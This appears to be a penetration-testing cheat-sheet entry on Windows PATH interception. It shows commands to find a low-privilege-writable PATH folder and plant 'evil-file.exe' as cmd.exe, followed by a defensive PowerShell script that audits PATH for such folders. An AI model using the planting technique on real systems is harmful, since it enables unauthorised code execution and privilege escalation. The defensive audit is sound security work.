$PATH Interception
Requirements:
PATH contains a folder that is writable by a low-privileged user.
That writable folder comes before the folder that contains the legitimate binary.
EXAMPLE:
List the contents of the PATH environment variable:
$env:Path
EXAMPLE OUTPUT: C:\Program Files\nodejs\;C:\WINDOWS\system32
See permissions of the target folder:
icacls.exe "C:\Program Files\nodejs\"
EXAMPLE OUTPUT: BUILTIN\Users: GR,GW
Place our evil-file in that folder:
copy evil-file.exe "C:\Program Files\nodejs\cmd.exe"
Because, in this example, "C:\Program Files\nodejs" comes before "C:\WINDOWS\system32" in the PATH variable, the next time the user runs "cmd.exe" our evil version in the nodejs folder will run instead of the legitimate one in the system32 folder.
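To check a host for exactly this condition from a defender's position, here is an added PowerShell example (not part of the original page) that walks $env:Path in order, inspects each folder's ACL for write rights granted to built-in low-privileged identities, and reports whether the folder precedes system32. The identity list and the generic-right bit values are assumptions noted in the comments.

```powershell
# Added example (not part of the original page): audit the current session's PATH for
# the condition described above, i.e. a folder that a low-privileged identity can
# write to and that is ordered before the system32 folder it could shadow.
# Assumptions: Windows PowerShell 5.1 or later; the built-in identity names below.
$lowPrivIds = @('BUILTIN\Users', 'Everyone', 'NT AUTHORITY\Authenticated Users',
                'NT AUTHORITY\INTERACTIVE')
# FileSystemRights.Write bits plus GENERIC_WRITE / GENERIC_ALL (shown by icacls as GW / GA)
$writeMask  = [int][System.Security.AccessControl.FileSystemRights]::Write -bor 0x40000000 -bor 0x10000000
$systemDir  = "$env:SystemRoot\system32"

# True when any Allow ACE grants a write right to one of the low-privileged identities.
function Test-LowPrivWritable {
    param([string]$Folder)
    if (-not (Test-Path -LiteralPath $Folder -PathType Container)) { return $false }
    $acl = Get-Acl -LiteralPath $Folder
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($lowPrivIds -notcontains $ace.IdentityReference.Value) { continue }
        if (([int]$ace.FileSystemRights -band $writeMask) -ne 0) { return $true }
    }
    return $false
}

# Returns one object per PATH entry that is writable by a low-privileged identity,
# noting whether it precedes system32 (and can therefore shadow binaries kept there).
function Find-WritablePathEntries {
    $entries = @(($env:Path -split ';') |
        ForEach-Object { $_.Trim('"', ' ').TrimEnd('\') } |
        Where-Object { $_ })
    $sysIndex = $entries.Count    # system32 missing from PATH: treat every entry as "before"
    for ($i = 0; $i -lt $entries.Count; $i++) {
        if ($entries[$i] -ieq $systemDir) { $sysIndex = $i; break }
    }
    for ($i = 0; $i -lt $entries.Count; $i++) {
        if (Test-LowPrivWritable $entries[$i]) {
            [pscustomobject]@{
                Position        = $i
                Folder          = $entries[$i]
                ShadowsSystem32 = ($i -lt $sysIndex)
            }
        }
    }
}

Find-WritablePathEntries | Format-Table -AutoSize
```

Any row with ShadowsSystem32 set to True is a folder whose ACL should be tightened (or which should be moved after the system folders in PATH); run it under the user context you want to assess, since $env:Path merges the machine and user PATH values.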